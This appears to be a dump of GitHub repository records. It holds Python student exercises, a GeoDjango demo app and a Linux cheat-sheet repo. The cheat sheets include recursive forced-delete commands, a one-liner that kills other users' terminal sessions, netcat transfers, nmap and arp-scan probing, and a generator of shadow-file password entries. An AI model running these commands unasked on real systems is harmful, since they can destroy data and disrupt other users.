"src_encoding": "UTF-8", "text": "import os.path\r\npath = '.'\r\nnum_files = len([f for f in os.listdir(path)\r\n if os.path.isfile(os.path.join(path, f))])\r\nprint(num_files)\r\n\r\nDIR = '/pypy/venv/Scripts'\r\nprint(len([name for name in os.listdir(DIR) if os.path.isfile(os.path.join(DIR, name))]))\r\n" }, { "alpha_fraction": 0.42687276005744934, "alphanum_fraction": 0.4887039363384247, "avg_line_length": 25.129032135009766, "blob_id": "daa902b82322753ceb601f62f279d49df4d63137", "content_id": "ceaafd34bc2503a11faf62415263c06ecbb6c97c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 949, "license_type": "no_license", "max_line_length": 152, "num_lines": 31, "path": "/lab4_task4.py", "repo_name": "TatianaVelychko/Python-Projects", "src_encoding": "UTF-8", "text": "#4.2\r\n\r\nmy_len = [['БО-331101', ['Акулова Алена', 'Бабушкина Ксения', 'Зотова Анастасия']], ['БВ-421102', ['Громова Евгения', 'Панина Анна']], ['БО-331103', ['Арнаутова Светлана']]]\r\n\r\nG = [j for i in my_len for j in i]\r\nprint(G)\r\n\r\nS = dict(zip(G[::2], G[1::2]))\r\nprint(S)\r\n\r\nfor key, value in S.items():\r\n for k in value:\r\n c = k.split(' ')\r\n if len(c[0]) < 7:\r\n print(key, ':', ''.join(k))\r\n\r\n#4.1, 4.3\r\n\r\nmy_len = [['БО-331101', ['Акулова Алена', 'Бабушкина Ксения', 'Зотова Анастасия']], ['БВ-421102', ['Громова Евгения', 'Панина Анна']], ['БО-331103', ['Арнаутова Светлана']]]\r\n\r\nG = [j for i in my_len for j in i]\r\nprint(G)\r\n\r\nS = dict(zip(G[::2], G[1::2]))\r\nprint(S)\r\n\r\nfor key, value in S.items():\r\n for k in value:\r\n c = k.split(' ')\r\n if c[0].startswith('П') and c[1].startswith('А'):\r\n print(key, ':', ''.join(k))\r\n" }, { "alpha_fraction": 0.32867133617401123, "alphanum_fraction": 0.4055944085121155, "avg_line_length": 16.875, "blob_id": "7d3a0162fc07dd36ccdff3aceadf347c6f909b10", "content_id": "ae99ce2791cfdb9324f3f03c3733c747bdf6036a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 143, "license_type": "no_license", "max_line_length": 38, "num_lines": 8, "path": "/task2.py", "repo_name": "TatianaVelychko/Python-Projects", "src_encoding": "UTF-8", "text": "L = [1, 2, 4, 'test', 2.2, 6, 4.1, -2]\n\nfor i in L:\n try:\n if i%2 == 0:\n print(i)\n except TypeError:\n continue\n" }, { "alpha_fraction": 0.5274913907051086, "alphanum_fraction": 0.5652921199798584, "avg_line_length": 13.729729652404785, "blob_id": "f8786fdda420c51d1e96e94d42821bcf8ef445d6", "content_id": "34e198180267667af9c1309ae47d4d5f40e74934", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 582, "license_type": "no_license", "max_line_length": 82, "num_lines": 37, "path": "/lab2_continue.py", "repo_name": "TatianaVelychko/Python-Projects", "src_encoding": "UTF-8", "text": "# 2.4\r\n\r\nL = ['repeat', 'retest', 'hello', '', '1234567890']\r\nS = ([elem for elem in L if elem.startswith('r')])\r\nprint('\\n'.join(S))\r\n\r\n# 3.2\r\n\r\nprint('enter S')\r\nS = int(input())\r\nL = 'R' * S\r\n\r\nprint(L)\r\n\r\n# 3.3\r\n\r\nimport string\r\nimport random\r\n\r\nS = ''.join(random.choice(string.digits) for _ in range(6))\r\n\r\nif '3' in S:\r\n print(S)\r\nelse:\r\n print(\"S doesn't continue 3\")\r\n\r\n# 3.4\r\n\r\nimport string\r\nimport random\r\n\r\nS = ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(6))\r\n\r\nif S.isalpha():\r\n print('digit is not in S')\r\nelse:\r\n print(S)\r\n" }, { "alpha_fraction": 0.48905110359191895, "alphanum_fraction": 0.5377128720283508, "avg_line_length": 20.83333396911621, "blob_id": "65aa3b1d30838432f4a53899cf9c4df560300c55", "content_id": "5582c3ec84cf140474bfcbd0adba4bb11bef93de", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 846, "license_type": "no_license", "max_line_length": 100, "num_lines": 36, "path": "/lab7.py", "repo_name": "TatianaVelychko/Python-Projects", "src_encoding": "UTF-8", "text": "#1\r\n\r\ndic = {'fruit': ['lemon', 'apple'], 'color': ['red', 'green', 'yellow'], 'drink': ['tea', 'coffee']}\r\nprint(len(dic.keys()))\r\n\r\n#2-4\r\n\r\nmyf = open('students1.csv', 'w')\r\nmyf.write('№;ФИО;Возраст;Группа\\n')\r\nmyf.write('1;Иванов Иван Иванович;22;БО-111111\\n')\r\nmyf.write('2;Яшков Илья Петрович;24;БО-222222\\n')\r\nmyf.write('3;Сидоров Семен Семенович;21;БО-111111\\n')\r\nmyf.close()\r\n\r\ndic = {}\r\n\r\nwith open('students1.csv', 'r') as myf:\r\n for line in myf:\r\n key, *value = line.split(';')\r\n dic[key] = value\r\n\r\nprint(dic)\r\n\r\nmyf2 = open('students2.csv', 'w')\r\n\r\nfor key, value in sorted(dic.items(), key=lambda value: (value[1])):\r\n try:\r\n value[1] = str(int(value[1]) + 1)\r\n print(key, ':', value)\r\n myf2.write(';'.join(value))\r\n myf2.write('\\n')\r\n\r\n except ValueError:\r\n pass\r\n\r\nprint(\"Writing complete\")\r\n" } ]
13
Morketh/Linux-Cheats
https://github.com/Morketh/Linux-Cheats
f10d0884a61d15277c38416e2aafbf12e6178b7a
7f150816affe93bc4bd8c99a0ef3de018667a233
75bf782a4a7640bc1719e5528fd9b704fc2c0d69
refs/heads/master
2020-12-24T16:40:46.825212
2019-10-17T05:37:43
2019-10-17T05:37:43
41,808,812
0
1
null
null
null
null
null
[ { "alpha_fraction": 0.6128318309783936, "alphanum_fraction": 0.6637167930603027, "avg_line_length": 40.09090805053711, "blob_id": "0f35f1d255dc8eda5a35b25070c1cc399b92ebd1", "content_id": "c76e033567b27abf4a91a4e42af9d06a09017e17", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 452, "license_type": "no_license", "max_line_length": 100, "num_lines": 11, "path": "/generateShadow.py", "repo_name": "Morketh/Linux-Cheats", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\nimport random, string, crypt, datetime\n\nuserList = ['user1','user2','user3','user4','user5']\ndateNow = (datetime.datetime.utcnow() - datetime.datetime(1970,1,1)).days\n\nfor user in userList:\n randomsalt = ''.join(random.sample(string.ascii_letters,10))\n randompass = ''.join(random.sample(string.ascii_letters,10))\n print(\"%s:%s:%s::0:99999:7:::\" % (user, crypt.crypt(randompass, \"$6$\"+randomsalt), dateNow))\n" }, { "alpha_fraction": 0.6788135766983032, "alphanum_fraction": 0.68813556432724, "avg_line_length": 27.780487060546875, "blob_id": "f04e19d145a3a5822608e331d108255d4cb45524", "content_id": "2f5853f4ffe0d93d916df24718cba92f7a72bae4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1180, "license_type": "no_license", "max_line_length": 221, "num_lines": 41, "path": "/Snippets.md", "repo_name": "Morketh/Linux-Cheats", "src_encoding": "UTF-8", "text": "##Sensor Scripts\n\nIPMI Interface\n+ Fan Speed\n```bash\nipmi-sensors | awk '/RPM/{print}'\n```\n\n+ Temperature \n```bash\nipmi-sensors | awk '/Temperature/{print}'\n```\n\n##Find Zero Length files and remove them\n\n```bash\nfind . -size 0c -delete\n```\n\n##KILL users terminals \n```bash\nps aux | grep \"pts\\/[2 4 0]\" | awk '{print $2}' | xargs -I {} kill -1 {}\n```\n\n##MD5Sums\nthis next command will take the file downloaded supply that to md5sum to check files we add the grep in to tell see ONLY lines that DON'T contain \"OK\" that way we can see all broken files and not worry about the good ones\n```bash\nwget -qO- http://URL-OF-FILE/checksum.dat | md5sum --check | grep -v \"OK\"\n```\n\n##Download and decompress to output location\n```bash\nwget -qO- http://URL-OF-FILE/FILE_NAME_HERE.tar.gz | tar zxv -C /PATH/TO/OUTPUT/\n```\n##Proxy over SSH\n```bash\nssh -D LOCAL_PROXY_PORT -p REMOTE_SSH_PORT USER@HOST.org\n```\n+ ```LOCAL_PROXY_PORT``` is the local port you want to set up as your tunnel entry point.\n+ ```REMOTE_SSH_PORT`` is normally 22 unless you have to use a nonstandard port for bypassing a firewall.\n+ ```USER@HOST.org``` is the host your connecting to. Normally this is your proxy server.\n" }, { "alpha_fraction": 0.4422857165336609, "alphanum_fraction": 0.4457142949104309, "avg_line_length": 35.41666793823242, "blob_id": "fd2256f519e6ff153bd55f0affe505bf94c02dd9", "content_id": "6db19a69de5a9ee7d209143a0b48f0b53c5462f4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 875, "license_type": "no_license", "max_line_length": 71, "num_lines": 24, "path": "/nmap_gephi", "repo_name": "Morketh/Linux-Cheats", "src_encoding": "UTF-8", "text": "import xml.etree.ElementTree as etree\ntree = etree.parse('wowser.xml')\nroot = tree.getroot()\nhosts = root.findall('host')\n\noutput_file = open('nmap_edges.csv', 'w')\noutput_file.truncate()\noutput_file.write(\"Source,Target\\n\")\n\nfor i in hosts:\n trace = i.find('trace')\n if not (trace == None):\n hop_count = 0\n for hop in trace:\n if hop_count == 0:\n last_ip = hop.attrib['ipaddr']\n else:\n output_file.write(last_ip)\n output_file.write(\",\")\n output_file.write(hop.attrib['ipaddr'])\n output_file.write(\"\\n\")\n last_ip = hop.attrib['ipaddr']\n hop_count = hop_count + 1\nprint \"Done\"\n\n" }, { "alpha_fraction": 0.36986300349235535, "alphanum_fraction": 0.6426940560340881, "avg_line_length": 31.44444465637207, "blob_id": "bf17bec05e106003f8630676f0c627c848fce2a0", "content_id": "c302517bc8bed8e47eb82271e96f21a346c30e9f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 876, "license_type": "no_license", "max_line_length": 107, "num_lines": 27, "path": "/VboxHeadlessSnapshots.sh", "repo_name": "Morketh/Linux-Cheats", "src_encoding": "UTF-8", "text": "#!/bin/bash\nVBOXUSR=\"vbox\"\n\n# ADD List of VM Names here for Daily Snapshots\ndeclare -a arr=(\n \"a2ae119a-ba26-4ff7-bfb7-c0857e2bc9e0\"\n \"8028742e-4e03-486e-b4cd-3c861b33a213\"\n \"540bdd79-fb5d-4f78-b367-34332edc177e\"\n \"98fc0d5f-c39f-483c-9570-a7009afcde57\"\n \"ccf063e2-11a4-46ef-8e85-af63f39a4b6c\"\n \"c79d7cec-7a27-4a73-ba71-6b591d5f0678\"\n \"fede01e4-d30d-4f1f-b85c-95a135178d99\"\n \"5ac765dd-551e-48bb-b685-06dcad677c15\"\n \"dbac0da2-0206-4390-9244-d410c2ff53ac\"\n \"4b1100da-26c0-498c-a29d-67d2d5835e4a\"\n \"e77d7fe0-d589-4620-b075-52b15329a712\"\n \"17c58403-cde0-459b-91a9-f414bfbdc678\"\n )\n\n# END VM UUID LIST\n\nfor VM in \"${arr[@]}\"\ndo\n NOW=`date +\"%m-%d-%Y%T\"`\n sudo -H -u $VBOXUSR bash -c \"VBoxManage snapshot $VM take \"$NOW\" --description 'Machine UUID: $VM'\"\n echo \" \"\ndone\n" }, { "alpha_fraction": 0.7575757503509521, "alphanum_fraction": 0.7575757503509521, "avg_line_length": 13.142857551574707, "blob_id": "56cedbf92d7005690c7d809a139f606898ba7bf7", "content_id": "fc9df9b517f76e804e05a3d229040e56d8df1c36", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 99, "license_type": "no_license", "max_line_length": 20, "num_lines": 7, "path": "/Common.md", "repo_name": "Morketh/Linux-Cheats", "src_encoding": "UTF-8", "text": "```bash\napt-get update\napt-get dist-upgrade\napt-get purge\napt-get autoclean\napt-get autoremove\n```\n" }, { "alpha_fraction": 0.5889636874198914, "alphanum_fraction": 0.6627187132835388, "avg_line_length": 30.743589401245117, "blob_id": "27ec53048f8bf8dde86efb1135c653ed4def5030", "content_id": "c0b94e58498914a02e26aa8878c31beca042cd39", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 3734, "license_type": "no_license", "max_line_length": 254, "num_lines": 117, "path": "/Torrent-lists.md", "repo_name": "Morketh/Linux-Cheats", "src_encoding": "UTF-8", "text": "\nCOUNT directory tree sort and chop the list and display the last value (works with named torrent files)\n```bash\nclear && ls -shal | awk '{print $10}' | sed -e 's:torrent-::g' | sort -n | tail -n 1\n```\n\n\n```bash\nawk '/<torrent>/{x=\"torrent-\"++i;}{print > x;}'\n```\n\nthe above code results in a split file containing this set of XML tags\n\nthis following snippet will search through an XML style-sheet and grab just the relevant info for the torrent\nyou will note in the following example the <magnet></magnet> tags were replaced to form an actual link\n```\n<title>Half Life 2 plus extras</title>\nmagnet:?xt=urn:btih:19e53b6485d0487d0babeae9c4c600a5eda71f74\n<size>3005661885</size>\n<seeders>24</seeders>\n<leechers>6</leechers>\n```\n\n```bash\nawk '/<title>/,/<leechers>/{print}' rich.xml | grep --ignore-case \"REGEX\" -A 4 | sed 's:<\\/magnet>::g' | sed 's:<magnet>:magnet\\:?xt=urn\\:btih\\::g'\n```\n\n```\n<torrent>\n<id>3234495</id>\n<title>[Request] Bamse - Världens starkaste björn.DivX</title>\n<magnet>eaee71d0c5834e0c91581198c314dd87c6e76854</magnet>\n<size>344371200</size>\n<seeders>0</seeders>\n<leechers>1</leechers>\n<quality><up>0</up><down>0</down></quality>\n<uploaded>2004-08-26 19:43:03</uploaded>\n<nfo>Önskemål: Bamse - Världens starkaste björn. Svenskt tal.</nfo>\n<comments>\n<comment><when>2004-08-27 11:59</when><what>Instämmer med Urkel!&lt;br /&gt;\nFinns det fler bamse-filmer vore det skoj ifall de kom upp på trackern. :bounce:</what></comment>\n<comment><when>2004-09-03 12:15</when><what>tittade på den här på en 32 tummare, och det var inga problem, syrrans ungar blev väldigt till sig när jag kom m$\n<comment><when>2006-07-08 10:58</when><what>När kommer den sista 0.1% ? Är det någon som har denna torrent komplett så var snäll och seeda. Lite tråkigt med$\n</comments>\n\n</torrent>\n```\n\n\n\nI think Python + BS4 is a good fit for this since we can scrape the required data and place into a MySQL database (See Icemelt)\n\nINITIAL DATA DUMP FROM WEB SITE\n\nIF title is ```<title>Not Found``` there is no data beyond this point on the page\n\n```\n<div id=\"title\">\nThe whole Pirate Bay magnet archive</div>\n<div id='details'>\n<dl class='col1'>\n<dt>Type:</dt>\n<dd><a href=\"/browse/699\" title=\"More from this category\">Other &gt; Other</a></dd>\n<dt>Files:</dt>\n<dd><a href=\"javascript:void(0);\" title=\"Files\" onclick=\"if( filelist &lt; 1 ) { new Ajax.Updater('filelistContainer', '/ajax_details_filelist.php', { method: 'get', parameters: 'id=7016365' } ); filelist=1; }; toggleFilelist(); return false;\">1</a></dd>\n<dt>Size:</dt>\n<dd>90.1&nbsp;MiB&nbsp;(94475182&nbsp;Bytes)</dd>\n<dt>Tag(s):</dt>\n<dd><a href=\"/tag/pirate+bay\">pirate bay</a> <a href=\"/tag/dump\">dump</a> </dd>\n</dl>\n<dl class='col2'>\n<dt>Uploaded:</dt>\n<dd>2012-02-08 03:48:18 GMT</dd>\n<dt>By:</dt>\n<dd><a href=\"/user/allisfine/\" title=\"Browse allisfine\">allisfine</a></dd>\n<dt>Seeders:</dt>\n<dd>20</dd>\n<dt>Leechers:</dt>\n<dd>1</dd>\n<dt>Comments</dt>\n<dd><span id='NumComments'>105</span>\n&nbsp; </dd>\n<br/>\n<dt>Info Hash:</dt><dd></dd>\n938802790A385C49307F34CCA4C30F80B03DF59C\n </dl>\n```\n\nanother torrent file had this format:\n\n3519077|Star Trek DS9 S7D1|4642166784|1|0|8aff8ea107b84f77fb0b47ce311739339af125a4\n\nsomething|Title|\n\nThis will print out a table with magnet links and torrent names\n\n```bash\ncat complete | grep \"[Ss]earch [Tt]erm\" | awk -F \"|\" '{print $2,\"<>magnet:?xt=urn:btih:\"$6}' | awk -F \"<>\" -f \"col.awk\"\n```\n\ncol.awk\n```awk\n{\n width=65;\n separator=\"\";\n\n for (i=1; i<=NF; i++) {\n if (match($i, /[-+]*[0-9]+[\\.]*[0-9]*/)) {\n printf(\"%\"width\"s\", $i);\n }\n else {\n printf(\"%-\"width\"s\", $i);\n }\n if (i == NF) printf(\"\\n\");\n else printf(\"%s\", separator);\n }\n}\n```\n" }, { "alpha_fraction": 0.5089569687843323, "alphanum_fraction": 0.5156537890434265, "avg_line_length": 78.61333465576172, "blob_id": "f8505a41468391cdea26aef33ca34ae07a36adbd", "content_id": "c5937455f3318b83a0408ac5390a60280e660385", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 5973, "license_type": "no_license", "max_line_length": 268, "num_lines": 75, "path": "/commands.md", "repo_name": "Morketh/Linux-Cheats", "src_encoding": "UTF-8", "text": "\n```bash\nfind -type f -print0 | xargs -0 md5sum > www.md5 #use find to search and then Xargs to split that to a single line command for md5sum to do a recursive md5sum of search path can also use -name '*.XXX' to search for any file with extention XXX\nfind . -name '*.oma' -print0 | xargs -0 -I % cp % /mnt/MUSIC/OMA #copys all OMA file in the DIR tree to /mnt/MUSIC/OMA\nfind . -name '*.XXX' -print0 | xargs -0 rm -fV #find and remove all files with XXX in dir TREE\nfind . -name 'FILE'\t\t #FIND FILE\nnetstat -an | grep PORT #do a portmap look up and display all entries with PORT\nnmap IPADDRESS -p PORT #probes the PORT on IPADDRESS can also use a HOSTNAME with out the -p maps all ports that are OPEN\ncat OS.sh | wall #print the file OS.sh into Wall to displayied on ALL ttys\nsudo apt-get dist-upgrade #install all upgrades\nsudo fdisk -l #list all file systems connected to the computer\nsudo ufw status #FIREWALL status\nuuidgen >> uuid.dat #make a random uuid and print to uuid.dat APPEND\nuptime #displays the uptime for the server\nhostname --fqdn #display the full qualified domain name\nmd5sum -c FILE.md5 #check files against FILE.md5\nmd5sum -b *.* > FILE.md5 #make an md5sum for files and store in FILE.md5\nsudo /etc/init.d/networking restart #restart the Network interface deamon\nnslookup WWW #look up IP with WWW host\nsudo sed -i 's/OLD-WORD/NEW-WORD/g' FILE-NAME #replace OLD-WORD with NEW-WORD in file with name FILE as ROOT\n (sed can also use 's:OLD-PATTERN:NEW-PATTERN:g')\nsudo mount SERVER-ADDY:/LocalRepos LOCAL-MOUNT-DIR #mount remote SERVER-ADDY:/LocalRepos into the local LOCAL-MOUNT-DIR\nchown NEWUSER FILE #change owner of FILE to NEWUSER. MUST BE ROOT!!!!\nsudo dhclient ADAPTER\t\t\t\t\t\t\t #release and renew the lease for ADAPTER\nsudo iptraf #IPtrafic monitor paket sniffer\nps -aux #display Process the 2nd colume is the PID\nkill -9 PID #PID is the Process ID can be found using ps -aux see above\nsudo crontab -l #list all Crontab Jobs that are running\n\nsudo cat /home/admiral/blacklist.domains >> /etc/squid/bad_domains #update bad_domains with blacklist.domain\nsudo reload squid #reloads all the config files to squid\nsudo restart squid #restarts the squid proxy server\n\n\n\ntar xvzf file.tgz\t\t\t\t\t\t #will unzip FILE.tgz\ntar -zxvf file.tar.gz\t\t\t\t\t\t\t # will extract everything from file.tar.gz\ntar -zcvf tarfile.tar.gz -C /path/to/foldername_tocompress # Compress Entire directory with Subdirectories\ndpkg --get-selections | grep php\t\t\t\t\t#this will grab the installed list and then filter it for a single package\ndpkg -L php5-gd\t\t\t\t\t\t\t\t\t\t#this will locate all the files for a specific package\n\ngrep -c processor /proc/cpuinfo\t\t\t\t# count number of processors on your system\ncat /proc/cpuinfo\t\t\t\t\t\t\t#print out a list of information about your processor\ngrep NR_CPUS /boot/config-`uname -r`\t\t#grab the MAX number of processors suported by KERNEL\ndmesg |grep processor\t\t\t\t\t\t#find the Number of processors in a system\nlscpu\t\t\t\t\t\t\t\t\t\t#indepth processor info including 64 bit compatability\n\niperf -s -p 65000\t\t\t\t\t\t #on machine1 (host, this one will receive)\niperf -c [ip of server] -p 65000\t\t\t\t #on machine2 (client, this one will upload)\n\n\n----------------------------------------------------------------- FIREWALL RULES ---------------------------------------------------------\n\niptables -A INPUT -m mac --mac-source MAC:ADDRSS:HERE -j ACCEPT #MAC adress filter ACCEPT from mac-source when defualt policy is DROP\niptables -A INPUT -m mac ! --mac-source MAC:ADDRSS:HERE -j DROP #MAC adress filter DROP from ALL BUT mac-source\n\n_________________________________________________________ server / client file transfers _________________________\n\nnc EXAMPLE.COM PORT | pv | tar -xf -\t\t\t#Client side to download with a speed bar on it\ntar -cf - PATH/TO/FILE | pv -s $(du -sb PATH/TO/FILE | awk '{print $1}') | nc -l PORT #server side with ETA\n\n\nsudo arp-scan --interface=eth1 --localnet #scan all addresses localnet using eth1 grabs fingerprint for mac IDs\n\n\n______________________________________ Hard drive Clone and Virtualization ___________________________________________\n\ndd if=/dev/sdb of=dd-image.raw #Clones the /dev/sdb drive\nVBoxManage convertdd dd-image.raw sda.vdi --format VDI --variant Fixed #Convert clone to Virtual drive\n\n______________________________________ A/V Converstion ___________________________________________\n\nfor f in *.mkv; do avconv -i \"$f\" -codec copy \"${f%.mkv}.mp4\"; done\n\ncurl http://URL_HERE | grep \"[Mm][Pp]3\" | sed 's:FILTER_TO_STRIP::g' | sed 's:PATTERN_TO_STRIP::g' | sed 's|.*:|http:|g' > MP3Links.txt\n```\n\n" }, { "alpha_fraction": 0.8066157698631287, "alphanum_fraction": 0.8066157698631287, "avg_line_length": 77.5999984741211, "blob_id": "c5b6235a4d71e35798e93b60152b14c561a6cc2c", "content_id": "1e14038a9216c2053a7f7c305dd2a43afd4347e5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 393, "license_type": "no_license", "max_line_length": 237, "num_lines": 5, "path": "/README.md", "repo_name": "Morketh/Linux-Cheats", "src_encoding": "UTF-8", "text": "# Linux-Cheats\nLinux Cheat Sheets\n\nSimple little repository for keeping commonly used command line snippets. Please feel free to add your own to the list.\nThese snippets of code are practicly useless if you copy and paste directly to a shell, most of these commands have things you may need to replace to effectivly use each snippet there is an explination for each one giving a brief how-to.\n" }, { "alpha_fraction": 0.6227598786354065, "alphanum_fraction": 0.6424731016159058, "avg_line_length": 29.16216278076172, "blob_id": "350601741d8b35520810764cddae8572de84a3ca", "content_id": "6c3f9b0470374d5737f76e769eb3ddf453f12f39", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1116, "license_type": "no_license", "max_line_length": 91, "num_lines": 37, "path": "/filesort.sh", "repo_name": "Morketh/Linux-Cheats", "src_encoding": "UTF-8", "text": "#!/bin/bash\npath=$1 # Starting path to the directory of the junk files\nvar=0 # How many records were processed\nSECONDS=0 # reset the clock so we can time the event\n\nclear\n\nif [[ -z $1 ]]; then\n echo \"Argument list is empty: $1 and $2\"\nfi\n\necho \"Searching $1 for file types and then moving all files into grouped folders.\"\n\n# add extentions here for fast matching\nfor ext in jpg mp3 txt locky mp4; do\n mkdir -p \"$ext\"\n # For simplicity, I'll assume your mv command supports the -t option\n find \"$1\" -name \"*.$ext\" -exec mv -t \"$ext\" {} +\ndone\n\n# now that we've moved all the easy ones lets look at each file one-on-one\nfor f in \"$1\"/*; do\n ((var++))\n ext=${f##*.}\n # Probably more efficient to check in-shell if the directory\n # already exists than to start a new process to make the check\n # for you.\n [[ -d $ext ]] || mkdir \"$ext\"\n mv \"$f\" \"$ext\"\ndone\n\ndiff=$SECONDS\necho \"$var Files found and orginized in:\"\necho \"$(($diff / 3600)) hours, $((($diff / 60) % 60)) minutes and $(($diff % 60)) seconds.\"\n\necho \"cleaning up empty directories.....\"\nfind . -type d -size 0c -delete\n" } ]
9
leonelphm/geodjango-demo
https://github.com/leonelphm/geodjango-demo
dbd1224a9fbeb6f34938296dd0e002ddcc08a612
9e7782e95b35f93af56ddc52bcb7e76f13b64b86
6f6bcfdae52518329b684223a6ada8e04884b96d
refs/heads/master
2021-07-08T17:32:27.885344
2017-10-06T19:07:19
2017-10-06T19:07:19
105,780,283
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.704049825668335, "alphanum_fraction": 0.7274143099784851, "avg_line_length": 31.100000381469727, "blob_id": "568251af41ba9a8ba62e1539207ad0c2d4084c35", "content_id": "9788d45c8460f8eba90a0e1ad40c594fd2df6210", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 648, "license_type": "no_license", "max_line_length": 114, "num_lines": 20, "path": "/geolocation/admin.py", "repo_name": "leonelphm/geodjango-demo", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\"\"\"\ngeodjango-demo\n\nCopyleft (@) 2017 CENDITEL nodo Mérida - Copyleft (@) 2017 CENDITEL nodo Mérida\n\"\"\"\n## @package geolocation.admin\n#\n# Admin correspondientes a la geolocation\n# @author Ing. Leonel Paolo Hernandez Macchiarulo (lhernandez at cenditel.gob.ve)\n# @author <a href='http://www.cenditel.gob.ve'>Centro Nacional de Desarrollo e Investigación en Tecnologías Libres\n# (CENDITEL) nodo Mérida - Venezuela</a>\n# @copyright <a href='http://www.gnu.org/licenses/gpl-2.0.html'>GNU Public License versión 2 (GPLv2)</a>\n# @version 1.0\nfrom django.contrib.gis import admin\n\nfrom .models import *\n\n\nadmin.site.register(Zipcode, admin.OSMGeoAdmin)\n" }, { "alpha_fraction": 0.7391156554222107, "alphanum_fraction": 0.7465986609458923, "avg_line_length": 25.981651306152344, "blob_id": "55b47f85cb632407ab640789d40bc2887f20066c", "content_id": "57e99166fe3e8f02a96751a7271ab07d7d2c44cf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 2948, "license_type": "no_license", "max_line_length": 284, "num_lines": 109, "path": "/README.rst", "repo_name": "leonelphm/geodjango-demo", "src_encoding": "UTF-8", "text": "Esta aplicación se trata de un demo para implementar django.contrib.gis.\n\nA continuación se presenta los pasos para instalar la aplicación en modo desarrollo\n\n1-) Instalar el controlador de versiones git:\n \n $ su\n\n # aptitude install git\n\n2-) Descargar el codigo fuente de geodjango-demo:\n\n Para descargar el código fuente del proyecto contenido en su repositorio GIT realice un clon del proyecto geodjango-demo:\n\n Si da problemas con el certificado digital entonces debemos saltar su chequeo con el siguiente comando\n\n $ export GIT_SSL_NO_VERIFY=True\n\n Realizar clone\n\n $ git clone https://github.com/leonelphm/geodjango-demo.git\n\n3-) Crear un Ambiente Virtual:\n\n El proyecto está desarrollado con el lenguaje de programación Python, se debe instalar Python v3.4.2. Con los siguientes comandos puede instalar Python y PIP.\n\n Entrar como root para la instalacion \n\n # aptitude install python3.4 python3-pip python3.4-dev python3-setuptools\n\n # aptitude install python3-virtualenv virtualenvwrapper\n\n Salir del modo root y crear el ambiente:\n\n $ mkvirtualenv --python=/usr/bin/python3 geodjango\n\n\n4-) Instalar los requerimientos del proyecto \n\n Para activar el ambiente virtual geodjango ejecute el siguiente comando:\n\n $ workon geodjango\n\n Quedando activado el entorno virtual de esta manera.\n\n (geodjango)$\n\n Entrar en la carpeta raiz del proyecto:\n\n (geodjango)$ cd geodjango-demo\n\n (geodjango)geodjango-demo$ \n\n Desde ahi se deben instalar los requirimientos del proyecto con el siguiente comando:\n\n (geodjango)$ pip install -r requerimientos.txt\n\n\n5-) Crear base de datos y Migrar los modelos:\n\n El manejador de base de datos que usa el proyecto es postgres, es necesario, tener instalado postgres y crear la base de datos desde postgres de la siguiente manera si se usa la consola de postgres, ademas se debe instalar postgis para el uso de una base de datos georeferenciada:\n\n Como super usuario instalar postgis:\n\n # aptitude install postgis\n\n # aptitude install postgresql-x.x-postgis-x.x\n\n Ingresar a la consola de postgres con la siguiente orden:\n\n $ psql \n\n Ejecutar la siguiente sentencia estando en la consola de postgres:\n\n postgres=# CREATE DATABASE geodjango OWNER=postgres ENCODING='UTF−8';\n\n postgres=# \\q\n\n $ psql geodjango\n\n geodjango=# CREATE EXTENSION postgis;\n\n Para migrar los modelos del proyecto se debe usar el siguiente comando:\n\n (geodjango)$ python manage.py makemigrations\n\n (geodjango)$ python manage.py makemigrations geolocation\n\n (geodjango)$ python manage.py migrate\n\n\n7-) Ejecutar la aplicacion geodjango-demo\n\n Para ejecutar la apliacion se debe ejecutar el siguiente comando:\n\n (geodjango)$ python manage.py runserver\n\n Ingresar a la ruta para registrar un zipcode en geodjango-demo.\n\n http://localhost:8000/geolocation/register-poly/\n\n\nContacto:\n\nleonelphm@gmail.com\n\nleonelphm@hotmail.com\n\nlhernandez@cenditel.gob.ve" }, { "alpha_fraction": 0.5489690899848938, "alphanum_fraction": 0.561855673789978, "avg_line_length": 35.375, "blob_id": "106a82cc003c931359477d7a905d0843533e5ab3", "content_id": "de782dce2ec21bcdf51a538004a295ca2753c217", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1170, "license_type": "no_license", "max_line_length": 114, "num_lines": 32, "path": "/geolocation/urls.py", "repo_name": "leonelphm/geodjango-demo", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\"\"\"\ngeodjango-demo\n\nCopyleft (@) 2017 CENDITEL nodo Mérida - Copyleft (@) 2017 CENDITEL nodo Mérida\n\"\"\"\n## @package geolocation.urls\n#\n# Urls correspondientes a la geolocation\n# @author Ing. Leonel Paolo Hernandez Macchiarulo (lhernandez at cenditel.gob.ve)\n# @author <a href='http://www.cenditel.gob.ve'>Centro Nacional de Desarrollo e Investigación en Tecnologías Libres\n# (CENDITEL) nodo Mérida - Venezuela</a>\n# @copyright <a href='http://www.gnu.org/licenses/gpl-2.0.html'>GNU Public License versión 2 (GPLv2)</a>\n# @version 1.0\nfrom django.conf.urls import url\n\nfrom .views import *\n\nurlpatterns = [\n url(r'^register-poly/',\n RegisterPolyView.as_view(),\n name=\"register_poly\"),\n url(r'^list-zipcode/',\n 